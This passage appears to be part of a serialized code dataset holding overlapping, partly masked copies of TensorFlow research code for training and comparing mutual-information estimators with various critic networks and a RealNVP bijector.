batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. 
By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 
2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n 
bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. 
By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
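Among the critics serialized above, `ConcatCritic` scores every (x_i, y_j) pair of a batch in one network pass: it tiles the two batches into n*n concatenated pairs, scores them, and reshapes (and transposes) the result into an [n, n] matrix whose diagonal again holds the paired samples. A standalone NumPy sketch of that tiling pattern (illustrative only; `pairwise_scores` and the toy scoring function are not from the dataset):

import numpy as np

def pairwise_scores(x, y, score_fn):
    """Return an [n, n] matrix with entry [i, j] = score(x_i, y_j)."""
    n = x.shape[0]
    x_tiled = np.repeat(x[None, :, :], n, axis=0)   # [n, n, dx], entry [i, j] = x_j
    y_tiled = np.repeat(y[:, None, :], n, axis=1)   # [n, n, dy], entry [i, j] = y_i
    pairs = np.concatenate([x_tiled, y_tiled], axis=2).reshape(n * n, -1)
    return score_fn(pairs).reshape(n, n).T          # transpose, as in the serialized code

rng = np.random.default_rng(1)
x, y = rng.normal(size=(8, 3)), rng.normal(size=(8, 5))
scores = pairwise_scores(x, y, lambda pairs: pairs.sum(axis=1))  # toy critic in place of the MLP
print(scores.shape)  # (8, 8)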
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in 
layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of 
masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in 